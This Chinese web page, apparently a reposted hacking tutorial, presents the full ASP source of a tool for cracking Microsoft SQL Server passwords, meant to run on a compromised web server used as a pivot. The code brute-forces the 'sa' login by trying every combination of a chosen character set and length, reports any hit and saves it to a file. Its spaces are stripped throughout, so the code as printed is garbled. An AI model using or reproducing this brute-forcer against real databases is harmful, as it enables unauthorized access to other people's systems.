用ASP实现MSSQL用户密码破解

也想出现在这里？点击联系我~

自己把以下代码保存为ASP文件。当然我还是一如既往的BS那些只改作者名字的家伙。

复制代码代码如下:

<%
'============ASPPortScannerbylake2===================
'http://lake2.0x54.org
'Version:0.1
'ForSpringBoard
'==========================================================
%>
<styletype="text/css">
body,td,th{color:#0000FF;font-family:Verdana,Arial,Helvetica,sans-serif;}
body{background-color:#ffffff;font-size:14px;}
a:link{color:#0000FF;text-decoration:none;}
a:visited{text-decoration:none;color:#0000FF;}
a:hover{text-decoration:none;color:#FF0000;}
a:active{text-decoration:none;color:#FF0000;}
.buttom{color:#FFFFFF;border:1pxsolid#084B8E;background-color:#719BC5}
.TextBox{border:1pxsolid#084B8E}
.styleRed{color:#FF0000}
</style>
<title>MSSQLCrackerforSpringBoard</title>
<%
DimPassword()
IfRequest.Form("go")<>"1"Then
%>
<divalign="center">Welcometo<ahref="http://lake2.0x54.org"target="_blank">http://lake2.0x54.org</a></div>
<formname="form1"method="post"action=""onSubmit="form1.Submit.disabled=true;">
ConnStr:
<inputname="conn"type="text"class="TextBox"id="conn"value="Provider=SQLOLEDB.1;DataSource=127.0.0.1;UserID=sa;Password={PASS};"size="70">
<br>
Char:
<inputname="char"type="text"class="TextBox"id="char"value="0123456789"size="30">
<br>
Length:
<inputname="len"type="text"class="TextBox"id="len"value="3"size="4">
<br>
Path:
<inputname="path"type="text"class="TextBox"value="<%=Server.MapPath("r.txt")%>"size="50">
<inputname="CFile"type="checkbox"class="TextBox"id="CFile"value="1"checked>
Enablel<br>
<inputname="go"type="hidden"id="go"value="1">
<br>
<inputname="Submit"type="submit"class="buttom"id="Submit"value="Run">
</form>
<%
Else
timer1=timer
Server.ScriptTimeout=7776000
ConnStr=Request.Form("Conn")
Char=request.Form("char")
LenChar=Len(Char)
ReDimpassword(LenChar)
Fori=1toLenChar
password(i)=Mid(Char,i,1)
Next
length=CInt(request.Form("len"))
CallLAKE("")
response.Write"Done!<br>Process"&tTime&"s"
Ifrequest.Form("CFile")<>""ThenCreateResult("Done!"&vbcrlf&tTime)
EndIf

SubLAKE(str)
IfLen(str)>=lengthThenExitSub
Forj=1toLenChar
pass=str&password(j)
IfLen(pass)=lengthThenCallCrack(pass)
CallLAKE(pass)
Next
EndSub

SubCrack(str)
OnErrorResumeNext
Setconn=Server.CreateObject("ADODB.connection")
conn.openReplace(ConnStr,"{PASS}",str)
IfErrThen
IfErr.Number<>-2147217843Then
response.Write(Err.Description&"<BR>")
response.End()
EndIf
Else
response.Write("IGetit!Passwordis<fontcolor=red>"&str&"</font><BR>Process"&tTime&"s")
Ifrequest.Form("CFile")<>""ThenCreateResult(str&vbcrlf&tTime)
response.End()
EndIf
EndSub

FunctiontTime()
timer2=timer
thetime=cstr(int(timer2-timer1))
tTime=thetime
EndFunction

SubCreateResult(t)
Setfs=CreateObject("Scripting.FileSystemObject")
Setoutfile=fs.CreateTextFile(request.Form("path"))
outfile.WriteLinet
Setfs=Nothing
EndSub
%>